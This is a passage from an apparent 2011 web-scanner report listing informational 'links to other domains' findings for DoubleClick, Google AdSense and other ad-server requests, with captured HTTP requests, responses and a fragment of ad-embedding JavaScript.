document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/1587021916/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
6/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2bhttp://ad.amtk-media.com/click?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y" TARGET="_blank">\n');
document.write (' <IMG SRC="http://ad.amtk-media.com/image?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y" WIDTH=728 HEIGHT=90 ALT="Click Here" BORDER=0>\n');
document.write (' </A>
...[SNIP]...
</script>\n');
}
if (position == 'x80') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=323024100?">\n');
document.write ('</SCRIPT>
...[SNIP]...
/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?http://ad.doubleclick.net/jump/N5877.774.5057472001621/B5104260;sz=88x31;ord=323024100?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N5877.774.5057472001621/B5104260;sz=88x31;ord=323024100?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Advertisement"></A>
...[SNIP]...
</NOSCRIPT>\n');
}
if (position == 'x81') {
document.write ('<IFRAME id="x81_600377597" SRC="http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?" WIDTH=88 HEIGHT=31 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?">\n');
document.write ('</SCRIPT>
...[SNIP]...
es_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?http://ad-emea.doubleclick.net/jump/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie4;abr=!ie5;sz=88x31;ord=600377597?">\n');
document.write ('<IMG SRC="http://ad-emea.doubleclick.net/ad/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie4;abr=!ie5;sz=88x31;ord=600377597?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
</IFRAME>\n');
}
if (position == 'x82') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2052462841/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=2052462841?">\n');
document.write ('</SCRIPT>
...[SNIP]...
omberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?http://ad-emea.doubleclick.net/jump/N1379.290479.MEDIABUYER/B5191871;sz=88x31;ord=2052462841?">\n');
document.write ('<IMG SRC="http://ad-emea.doubleclick.net/ad/N1379.290479.MEDIABUYER/B5191871;sz=88x31;ord=2052462841?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Advertisement"></A>
...[SNIP]...
ts/international/story/L44/1061312212/x83/Bloomberg/2956629_BH/bannerad_animloop.gif.html/72634857383032345a51594144454b2b?http://preview.bloomberg.com/mobile/" target="_blank"> \n');
document.write ('<img src="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/2956629_BH/bannerad_animloop.gif/1285946185" border="0" \n');
document.write ('width="88" height="31" alt=""/></a>
...[SNIP]...

19.13. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The page was loaded from a URL containing a query string:

http://ads1.revenue.net/j?site_id=12169&pplacement_id=1&r_num=58437537

The response contains the following link to another domain:

http://panther1.cpxinteractive.com/mz/ds.js

Request

Response

19.14. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=media6degrees

The response contains the following link to another domain:

http://idpix.media6degrees.com/orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1

Request

GET /pixel?nid=media6degrees HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Found
Location: http://idpix.media6degrees.com/orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 299
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://idpix.media6degrees.com/orbserv/hbpix?pixId=2725&tpd=CAESEB9wkIpmi6GvAUSnjgAPob4&cver=1">here</A>
...[SNIP]...

19.15. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:38:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1">here</A>
...[SNIP]...

19.16. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1">here</A>
...[SNIP]...

19.17. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1979187633561026&output=html&h=250&slotname=7597199020&w=300&lmt=1305218253&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200253399&bpp=8&shv=r20110427&jsv=r20110427&correlator=1305200253495&frm=0&adk=1684246542&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=1229711023&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=211&xpc=zWqV5KscOz&p=http%3A//www.bloomberg.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-1979187633561026%26adU%3DAmoLatina.com%26adT%3DHottest%2BBrazilian%2BGirls%26adU%3Dwww.WisdomTree.com/Large-Dividends%26adT%3DLarge%2BDividend%2BStocks%26adU%3Dwww.Sovereign-Investor.com%26adT%3D%252475%2BSilver%253F%26gl%3DUS&usg=AFQjCNHWPgCzZKsTltLjbFuLVuXLe6zcjg

Request

GET /pagead/ads?client=ca-pub-1979187633561026&output=html&h=250&slotname=7597199020&w=300&lmt=1305218253&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200253399&bpp=8&shv=r20110427&jsv=r20110427&correlator=1305200253495&frm=0&adk=1684246542&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=1229711023&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=211&xpc=zWqV5KscOz&p=http%3A//www.bloomberg.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:37:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13474

<!doctype html><html><head><style>a{color:#0033cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-1979187633561026%26adU%3DAmoLatina.com%26adT%3DHottest%2BBrazilian%2BGirls%26adU%3Dwww.WisdomTree.com/Large-Dividends%26adT%3DLarge%2BDividend%2BStocks%26adU%3Dwww.Sovereign-Investor.com%26adT%3D%252475%2BSilver%253F%26gl%3DUS&usg=AFQjCNHWPgCzZKsTltLjbFuLVuXLe6zcjg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.18. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4453256361272375&output=html&h=60&slotname=7817023585&w=468&lmt=1302852174&flash=10.2.154&url=http%3A%2F%2Fwww.vcprodatabase.com%2F&dt=1305198148368&bpp=5&shv=r20110427&jsv=r20110427&correlator=1305198148409&frm=0&adk=3509212296&ga_vid=1338690755.1305198149&ga_sid=1305198149&ga_hid=931142865&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=909&bih=964&eid=36813005&fu=0&ifi=1&dtd=1077&xpc=0qMkZHjNDT&p=http%3A//www.vcprodatabase.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.vcprodatabase.com/%26hl%3Den%26client%3Dca-pub-4453256361272375%26adU%3Dwww.hardmoneybankers.com%26adT%3DPrivate/Hard%2BMoney%2BLoans%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&usg=AFQjCNF4NPVpdQWtdgxlyyYIr-24dl6l-Q

Request

GET /pagead/ads?client=ca-pub-4453256361272375&output=html&h=60&slotname=7817023585&w=468&lmt=1302852174&flash=10.2.154&url=http%3A%2F%2Fwww.vcprodatabase.com%2F&dt=1305198148368&bpp=5&shv=r20110427&jsv=r20110427&correlator=1305198148409&frm=0&adk=3509212296&ga_vid=1338690755.1305198149&ga_sid=1305198149&ga_hid=931142865&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=909&bih=964&eid=36813005&fu=0&ifi=1&dtd=1077&xpc=0qMkZHjNDT&p=http%3A//www.vcprodatabase.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:02:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5245

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.vcprodatabase.com/%26hl%3Den%26client%3Dca-pub-4453256361272375%26adU%3Dwww.hardmoneybankers.com%26adT%3DPrivate/Hard%2BMoney%2BLoans%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&usg=AFQjCNF4NPVpdQWtdgxlyyYIr-24dl6l-Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...

19.19. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8313336773978288&output=html&h=125&slotname=9131094990&w=125&lmt=1305218266&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200266480&shv=r20110427&jsv=r20110427&saldr=1&correlator=1305200266507&frm=1&adk=3423698080&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=505836890&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&ifk=502837744&eid=33895150&fu=4&ifi=1&dtd=30

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-8313336773978288%26adU%3Dwww.BarclayHedge.com%26adT%3DHedge%2BFund%2BDirectory%26gl%3DUS&usg=AFQjCNH-A1nwGSLE2d-P-boWFs4NzT2_IA

Request

GET /pagead/ads?client=ca-pub-8313336773978288&output=html&h=125&slotname=9131094990&w=125&lmt=1305218266&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200266480&shv=r20110427&jsv=r20110427&saldr=1&correlator=1305200266507&frm=1&adk=3423698080&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=505836890&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&ifk=502837744&eid=33895150&fu=4&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:38:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9591

<!doctype html><html><head><style>a{color:#0033cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%26hl%3Den%26client%3Dca-pub-8313336773978288%26adU%3Dwww.BarclayHedge.com%26adT%3DHedge%2BFund%2BDirectory%26gl%3DUS&usg=AFQjCNH-A1nwGSLE2d-P-boWFs4NzT2_IA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.20. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305218308&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305200308907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305200308919&frm=0&adk=2225227735&ga_vid=33945028.1305200309&ga_sid=1305200309&ga_hid=872394992&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1046&bih=964&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F10%2Fapollo-to-buy-out-american-idol-owner%2F&fu=0&ifi=1&dtd=47&xpc=ipKQdjql95&p=http%3A//topics.nytimes.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3Dwww.forsalebyowner.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNGTPrDqWM6BX9J08BYJD4g1Qryo8w

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305218308&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305200308907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305200308919&frm=0&adk=2225227735&ga_vid=33945028.1305200309&ga_sid=1305200309&ga_hid=872394992&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1046&bih=964&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F10%2Fapollo-to-buy-out-american-idol-owner%2F&fu=0&ifi=1&dtd=47&xpc=ipKQdjql95&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
